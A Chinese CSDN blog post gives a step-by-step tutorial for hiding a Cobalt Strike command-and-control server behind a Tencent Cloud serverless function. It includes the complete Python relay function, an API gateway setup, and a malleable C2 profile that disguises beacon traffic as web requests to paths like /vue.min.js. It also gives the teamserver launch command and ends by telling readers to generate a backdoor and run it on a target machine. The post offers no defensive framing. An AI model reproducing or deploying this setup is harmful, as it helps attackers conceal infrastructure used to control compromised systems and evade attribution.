云函数隐匿C2服务器

最新推荐文章于 2024-03-10 00:00:00 发布
最新推荐文章于 2024-03-10 00:00:00 发布
阅读量7k 收藏 1
点赞数
文章标签: 网络 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58687645/article/details/123274357
版权

第一步,创建云函数

登录腾讯云平台,访问云函数功能链接:https://console.cloud.tencent.com/scf/list?rid=8&ns=default。点击新建,创建方式选择自定义创建。函数名称可以自定义进行设置,主要是函数代码部分,将下面内容复制到函数代码中:

# -*- coding: utf8 -*-
import json,requests,base64
def main_handler(event, context):
    C2='http://<C2服务器地址>' # 这里可以使用 HTTP、HTTPS~下角标(如果使用443将http改为https即可)
    path=event['path']
    headers=event['headers']
    print(event)
    if event['httpMethod'] == 'GET' :
        resp=requests.get(C2+path,headers=headers,verify=False) 
    else:
        resp=requests.post(C2+path,data=event['body'],headers=headers,verify=False)
        print(resp.headers)
        print(resp.content)
    
    response={
        "isBase64Encoded": True,
        "statusCode": resp.status_code,
        "headers": dict(resp.headers),
        "body": str(base64.b64encode(resp.content))[2:-1]
    }
    return response

C2的值填写c2服务器地址就可以了,后面也不再需要增加:80:443,点击完成后,云端会部署函数。

创建完成。

选择第二个功能:触发管理,创建触发器。触发版本选择$LATEST,触发版本选择API网关触发,其余的就不需要动了,点击提交

触发器创建完成,点击API服务名,进入到管理API页面,在刚新建的API上,点击编辑。在编辑API页面中,将路径改为/,点击立即完成-发布服务即可。

二、 服务器端新增 p.profile文件 (放在cs跟目录下);将一下代码复制进去;

set sample_name "kris_abao";

set sleeptime "3000";
set jitter    "0";
set maxdns    "255";
set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";

http-get {

    set uri "/api/getit";

    client {
        header "Accept" "*/*";
        metadata {
            base64;
            prepend "SESSIONID=";
            header "Cookie";
        }
    }

    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Server" "Nodejs";
        output {
            base64;
            print;
        }
    }
}
http-stager {  
    set uri_x86 "/vue.min.js";
    set uri_x64 "/bootstrap-2.min.js";
}
http-post {
    set uri "/api/postit";
    client {
        header "Accept" "*/*";
        id {
            base64;
            prepend "JSESSION=";
            header "Cookie";
        }
        output {
            base64;
            print;
        }
    }

    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Connection" "keep-alive";
        output {
            base64;
            print;
        }
    }
}

运行cs : ./teamserver ip 密码 p.profile

三、设置监听器

管理API页面中,点击我们刚创建的APIid,进入到api的基本信息页面,我们要使用的是默认访问地址,用在cobalt strike创建监听器时使用。创建监听器时,我选择的是https,然后在HTTP HostsHTTP Host(stager)填入之前复制的地址。(这里是否选择http协议,根据你函数里的类型来选择)

 

 

监听器创建完成后,生成后门程序,在靶机运行既可上线。

安全菜
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
开源版本gpt3.5无需服务器搭建(阿里函数).rar
04-10
开源版本gpt3.5无需服务器搭建(阿里函数开源版本gpt3.5无需服务器搭建(阿里函数开源版本gpt3.5无需服务器搭建(阿里函数开源版本gpt3.5无需服务器搭建(阿里函数开源版本gpt3.5无需服务器搭建(阿里函数开源版本gpt3.5无需服务器搭建(阿里函数开源版本gpt3.5无需服务器搭建(阿里函数开源版本gpt3.5无需服务器搭建(阿里函数开源版本gpt3.5无需服务器搭建(阿里函数开源版本gpt3.5无需服务器搭建(阿里函数开源版本gpt3.5无需服务器搭建(阿里函数开源版本gpt3.5无需服务器搭建(阿里函数开源版本gpt3.5无需服务器搭建(阿里函数开源版本gpt3.5无需服务器搭建(阿里函数开源版本gpt3.5无需服务器搭建(阿里函数开源版本gpt3.5无需服务器搭建(阿里函数开源版本gpt3.5无需服务器搭建(阿里搭建前说明:此教程使用阿里函数搭建,搜阿里函数,开通,领取100万次调用。 此教程只是函数使用阿里,数据库什么的不用动,如果你之前有版本上线,直接复制那个版本的数据库账号密码填写到新搭建的阿里函数即可保留用户数据。
腾讯服务器函数的使用
01-06
腾讯服务器函数的使用 函数 函数是什么 函数就是供应商把底层的开发平台搭建好,我们可以直接编写函数代码放在函数平台上,然后调用函数实现相应的功能。而不需要去考虑开发平台。它是由事件触发,只有事件触发时才会调用函数。调用函数时,由函数平台向资源池中申请运行函数所需要的资源,再分配给函数运行,比如CPU、内存等资源。函数执行完后由平台将资源回收到资源池中;事件没触发时,它所需要的资源是处于闲置状态的。函数调用时申请资源,运行完后回收资源,能够使得资源得到高效的利用。而且函数平台也保证了资源分配的高可用。 优点 函数,它是一个不需要购买服务器的情况下,就能运行函数。有上面函数
攻击技术:命令和控制服务器C2)是什么意思
最新发布
网络研究观
03-10 2940
解决基于命令和控制服务器的威胁需要持续的承诺和强大的网络安全领导力。
chatgpt函数代理包
06-05
可使用腾讯,阿里函数一键上传代码即可体验代理服务
腾讯服务器函数架构精解
02-25
继虚拟机,容器技术,无服务器化成为新的行业热点,无服务器函数可以让用户无需关心服务器的部署运营,只需开发最核心的业务逻辑,即可实现上线运营,具备分布容灾能力,可依据负载自动扩缩容,按照实际调用次数与时长计费。本次主要分享腾讯服务器函数在技术实现上的挑战及架构实现原理。主要从以下四个方面来分享一下无服务器函数函数的价值及使用场景函数架构原理函数关键技术点函数行业进展趋势无服务器函数(ServerlessCloudFunction)是腾讯提供的无服务器(serverless)执行环境,帮助用户在没有购买和管理服务器时仍能运行代码。用户只需要使用平台支持的语言编写核心代码及
函数+Python+测试
05-30
函数+Python+测试
函数隐藏C2技术的防御反制思路
include_voidmain的博客
08-30 1609
函数隐藏C2技术的防御反制思路
【红队APT】反朔源隐藏&C2项目&CDN域前置&函数&数据中转&DNS转发
今天是几号的博客
04-19 2259
区别于单纯的CDN隐藏IP技术;域前置技术采用高权重域名进行伪装,效果要更上一层楼!可以看到这里正常上线,也是简单的进行流量代理,这里我把上面的iptables转发配置清空了,避免干扰 注: 如果中转服务器被拿下的话,那么搜集信息很可能就可以发现请求重定向的痕迹,从而找到真实C2地址。 请求重定向也可以和之前的CDN方法相结合,之前CDN方法是通过CDN将请求转发到真实的C2服务器上,而添加请求重定向后,流程就变为了CDN转发到中转服务器,中转服务器再转到C2,达到双重隐藏的效果。
函数隐藏c2服务器
weixin_44747030的博客
01-15 8523
学习记录
隐藏C2服务器IP的各种方法总结
sweelg的博客
09-18 838
利用CDN、域前置、重定向三种技术隐藏C2的区别_Shanfenglan's blog-CSDN博客_域前置 前言 这个课题前段时间已经分别做过研究,但没有写三者的区别分析,以为自己可以将三种技术永远记在心里,但是事实是确实淡忘一部分知识点,导致现在对三者的理解出现偏差。 反思:以后倘若需要做技术记录,一定要详细详细再详细,有备无患。不能抱有侥幸心理,因为你永远不知道,问题与遗忘哪一个会先来 对于三种隐藏技术的理解 CDN技术隐藏C2 反溯源-cs和msf域名上线 利用CDN隐藏C2地址 使用CDN
函数实现隐藏c2地址
milu_Sec的博客
12-30 493
说明:函数是一个可以为开发者提供的无服务器执行代码的环境,相当于我们可以提前部署一个函数,当我们需要运行这段代码的时候只需要通过去请求某一个特定的地址(即函数地址)就可以运行了。最后,该函数将响应的状态码、标头和正文转换为一个 JSON 对象,并将其返回给调用方。配置代码写如下代码,c2地址填写 协议+ip+port,如http://127.0.0.1:80,本文使用80端口,所以后续使用http beacon。该函数的目的是将传入的 HTTP 请求转发到指定的 URL,并将响应返回给调用方。
建筑行业信息系统建设中关于函数攻击的防御体系研究
Hern(宋兆恒)
03-04 706
2.1 函数定义函数是 Serverless(无服务器计算)目前应用最广泛的一种计算服务产品,提供 FaaS(Function as a Service)能力。函数是一段运行在端的、轻量的、无关联的、并且可重用的代码,无需管理服务器,只需编写和上传代码,即可获得对应的数据结果。使用函数可以使企业和开发者不需要担心服务器或底层运维设施,可以更专注代码和业务本身,也可以使代码进一步解耦,增加其重用性。2.2 函数的特点。
使用函数来隐藏webshell的真实IP
weixin_61638307的博客
04-10 490
在平时的学习工作中,大家有没有遇到一穿webshell就被ban掉IP呢,今天本文就决定分享一个使用函数来隐藏自己的真实IP的案例,也可以利用函数的多出口性为了防止被红队溯源。
函数(变相代理池)的三种常见利用
qq_44005305的博客
02-15 237
之前学到一些函数的利用,感觉很有趣,于是借此篇来总结一下三种对函数的简单利用方式。
分享一次应急处置案例
qq_44433172的博客
08-27 218
通过抓包分析主机被植入木马病毒,访问腾讯API域名,根据外连域名的主程序溯源为svchost.exe,继续分析最终为MpCmdRun.exe发起的,该文件会加载路径下的mpClient.dll文件,这个是最终的CS木马,下面会逐一进行分析。接到上级发来的通知说内网有服务器中了CS木马,经过排查是在2022年中的CS木马,红队通过钓鱼方式获取到了集团的用户主机权限,通过计划任务开机自启动方式将Windows白名单程序加载恶意DLL文件实现权限维持与免杀天擎。
利用腾讯函数隐藏C2服务器
xiaokp7的博客
06-17 700
隐藏c2服务器
函数隐藏C2
问题很多的小明
05-09 712
函数内容: 向真实C2服务器传递客户端真实ip,转发GET、POST请求,内容参考https://mp.weixin.qq.com/s/3EM6vqPJSA5E_FH6tKO8iw 部署后测试,访问API网关,真实服务器监听对应端口,查看数据包: 服务端配置 获取真实ip的必要配置,参考https://mp.weixin.qq.com/s/lL3UKCRW0cN4SgQIZl7vYw set sample_name "t"; set sleeptime "3000"; set ji
C2使用函数进行隐藏和加速
sweelg的博客
09-18 380
C2使用函数进行隐藏和加速利用函数将我们的请求进行转发(和一些使用第三方应用进行转发是一样的);C2客户端发出的流量经过 函数的转发,到达我们的C2服务器,达到隐藏的效果https://mp.weixin.qq.com/s/gfBE-HaUCgQw8L0QByqTDA ...
使用腾讯函数隐藏C2
ATpiu的博客
02-16 4901
使用腾讯函数+API网关隐藏C2服务端(cobaltstrike 4.1)
微信函数调用mqtt服务器用什么api
06-01
需要注意的是,在使用函数调用 MQTT 服务器时,需要确保 MQTT 服务器的 IP 地址和端口号设置正确,并且可以被函数访问。此外,需要确保函数中安装了正确的 MQTT 库,并且编写了正确的连接和操作 MQTT 服务器的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值